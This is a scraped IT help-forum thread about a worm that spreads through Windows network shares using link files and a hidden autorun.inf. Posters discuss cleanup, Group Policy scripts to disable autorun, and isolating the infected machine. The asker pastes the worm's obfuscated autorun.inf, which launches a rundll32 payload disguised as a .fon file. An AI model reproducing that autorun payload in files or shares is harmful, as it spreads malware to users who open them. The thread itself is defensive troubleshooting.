fireguy1125
asked on
Autorun.inf Virus Spreading Through network
Have a virus coming up as W32.SillyFDC.BDP!lnk and Bloodhound.Exploit.343 and also Symantec Intrustion Prevntion is blocking TCP Traffic:
[SID: 23801] HTTP MS Windows Link File RCE 1 detected.
Traffic has been blocked from this application: C:\Windows\system32\ntoskr nl.exe
from various internal remote hosts, as this virus is spreading through what looks like network shares, as it appears on various server shares, and then on the user's computer when they open the share drive, there is a hidden autorun.inf file that contains the following:
[efmhubeq]
hetjgohsgiudjqluyhwveycirh =wqugjfhjx qrdbiunlwt dwmebaivss dnsocww
[amnhnrvycvwacxyplfebmbn]
wlqlkwpbetifpixvceekcqmdlm mdiyb=u
[autORuN]
aCTIon=OpEN
ljntb=tbbskdxwvkssjinucmha ns
IcON=%wINDIr%\SYstem32\sHE lL32.Dll,4
fkcixwufeovvwasjclgnrmp=pu pra
useautoplaY=1
judvlknsjpyarjbxugwsbxph=i bsuamdxvg
OpEN=RunDLL32.Exe sETuP1911.Fon,aa4b94
yipuvpwxpgnviaoach=pbwukto kchqrckmwn wfjjxtbgjn ihuomesls
shEll\EXpLore\CoMMAnd=RUNd lL32.exE SETup1911.FOn,aA4b94
uifqnvjjecpisiecukfbtxgomj pkvehm=ehj crrvrde
sHElL\OPEN\cOmMAnd=RUndll3 2.ExE sEtup1911.fOn,AA4b94
llnkaevfqolexbniglqxqseamo pohxxgile= kholcudayb y
I'm going to all the servers, approx 30 of them and disabling the hidden shares C$, D$, and ADMIN$ and also putting in the reg key to prevent them from being recreated.
I need to push out a logon script for all the PCs in the domain to disable the running of autorun.inf files, because when the users open these shares, it just keeps spreading. Need instructions on how to assign this script to all the GPOs and have it run when the computer restarts.
[SID: 23801] HTTP MS Windows Link File RCE 1 detected.
Traffic has been blocked from this application: C:\Windows\system32\ntoskr
from various internal remote hosts, as this virus is spreading through what looks like network shares, as it appears on various server shares, and then on the user's computer when they open the share drive, there is a hidden autorun.inf file that contains the following:
[efmhubeq]
hetjgohsgiudjqluyhwveycirh
[amnhnrvycvwacxyplfebmbn]
wlqlkwpbetifpixvceekcqmdlm
[autORuN]
aCTIon=OpEN
ljntb=tbbskdxwvkssjinucmha
IcON=%wINDIr%\SYstem32\sHE
fkcixwufeovvwasjclgnrmp=pu
useautoplaY=1
judvlknsjpyarjbxugwsbxph=i
OpEN=RunDLL32.Exe sETuP1911.Fon,aa4b94
yipuvpwxpgnviaoach=pbwukto
shEll\EXpLore\CoMMAnd=RUNd
uifqnvjjecpisiecukfbtxgomj
sHElL\OPEN\cOmMAnd=RUndll3
llnkaevfqolexbniglqxqseamo
I'm going to all the servers, approx 30 of them and disabling the hidden shares C$, D$, and ADMIN$ and also putting in the reg key to prevent them from being recreated.
I need to push out a logon script for all the PCs in the domain to disable the running of autorun.inf files, because when the users open these shares, it just keeps spreading. Need instructions on how to assign this script to all the GPOs and have it run when the computer restarts.
ASKER
the admin$ shares have been disabled. I already have a batch file created with
regedit /s "\\fileserver\share\disabl eautorun.r eg"
I put this in our \\domain.net\sysvol\domain .net\scrip ts folder, and associated it with the Users Group Policy in the User Configuration > Scripts > Logon > with it pointing to \\domain.net\sysvol\domain .net\scrip ts\disable autorun.ba t file, however it doesn't seem to be running.
Should this be put in the Computer Configuration and run as a Startup Script? Or does it have to run as a user Configuration Logon script?
regedit /s "\\fileserver\share\disabl
I put this in our \\domain.net\sysvol\domain
Should this be put in the Computer Configuration and run as a Startup Script? Or does it have to run as a user Configuration Logon script?
Even if everything else works you should innoculate your network shares by running USB-Set on them. This app (free) creates a folder called autorun.inf on the drive and then creates 2 files within the folder one of them is hidden and read only. In this way if a user connects to your shared network drive and the computer attempts to install the autorun file, it can't (effectively - anything is possible).
You might also think of using USB Firewall: http://www.net-studio.org/
USB-Set: http://www.geekstogo.com/forum/USB-set-file378.html
You might also think of using USB Firewall: http://www.net-studio.org/
USB-Set: http://www.geekstogo.com/forum/USB-set-file378.html
ASKER
When i run the USB-Set tool, it says it does not apply to my OS, which is Server 2003 that has all the shares
run it of an xp worstation that has access to the shares. This will see the network shares and innoculate them.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER
It only seems to be the following 4 files:
myporno.avi.lnk
pornmovs.lnk
setup1911.lnk
autorun.inf
I don't see an exe anywhere, and running malwarebytes, combofix, and symantec didn't produce any exe files.
It just seems to keep spreading the above 4 files and creating those links in shared mapped drives.
myporno.avi.lnk
pornmovs.lnk
setup1911.lnk
autorun.inf
I don't see an exe anywhere, and running malwarebytes, combofix, and symantec didn't produce any exe files.
It just seems to keep spreading the above 4 files and creating those links in shared mapped drives.
ASKER
Still awaiting feedback on my logon/startup script, and why it's not applying on workstations.
I have the same thing happening, I narrowed it down to 1 computer by verifying owner of the file. I have also narrowed it down to being created inside the svchost.exe process, unfortunately it is the main one so it appears to have infected one of the .dlls I am still trying to determine which one. By main one I mean the one which has automatic updates, bits, computer browser, hid... all that fun stuff in it :)
ASKER
What have you done to stop the spread? So far 3 of my servers have crashed with the error:
Windows could not start beacuse of an error in the software. Please report this problem as: load needed DLLs for kernel. Please contact your support person to report this problem.
I've forced an update of the symantec client for all workstations, but it appears as though it is only detecting and not removing this problem.
Windows could not start beacuse of an error in the software. Please report this problem as: load needed DLLs for kernel. Please contact your support person to report this problem.
I've forced an update of the symantec client for all workstations, but it appears as though it is only detecting and not removing this problem.
I tracked the computer with the problem and unhooked it from the network. I use F-Secure, it finds a virus and says it removes it, but does not. (Exploit:W32/WormLink.C) I did have one server crash with the error you mentioned, I tried everything to get it back, ended up doing a inplace upgrade of the same OS over itself to resolve the issue. So I have mine isolated to a single laptop off the network right now trying to find what it is incase it hits again, but it is not affecting my network at all currently.
My testing is involving connecting a flash drive with nothing on it, watching it create the files, and going through killing threads one at a time trying to isolate it.
My testing is involving connecting a flash drive with nothing on it, watching it create the files, and going through killing threads one at a time trying to isolate it.
Oh also forgot to mention a few things I found with it late last week (it hit me last thursday morning). It does not hit hidden shares, it seems to scan based on network neighborhood type functionality to find PC's and shares to copy the 4 files you mentioned into. So if you go through network neighborhood and browse each computer in order, use a clean pc with admin rights, you can find and remove the files from the shares, sucky in a big network the script mentioned above I would probably tweak to automate it. Make sure you do several manually though so you can locate the owner, mine showed as a PC name (computername$), like ones from active directory computers container and get those computers off the network asap.
SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
ASKER CERTIFIED SOLUTION
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Yes it appears most antivirus companies and such have started to detect this now, guess I got in on the fun stage of before that. F-Secure is now finding it as a combination of Trojan.Agent.ASEB and Trojan.Injector.HI, this first machine it hit however looks clean and is not finding anything else, but is just not acting right, you get that "feel" from it so I am going to wipe it since it is a few years old and may be something else I'm noticing than this.
This question has been classified as abandoned and is closed as part of the Cleanup Program. See the recommendation for more details.
You could pipe through the results of NET VIEW from a command line and then copy the needed scripts, tools, etc. to each of the computers on your network via Admin Share on the respective PC..
This may help..
http://www.robvanderwoude.com/ntadmincommands.php#Cmd14
HTH,
Kent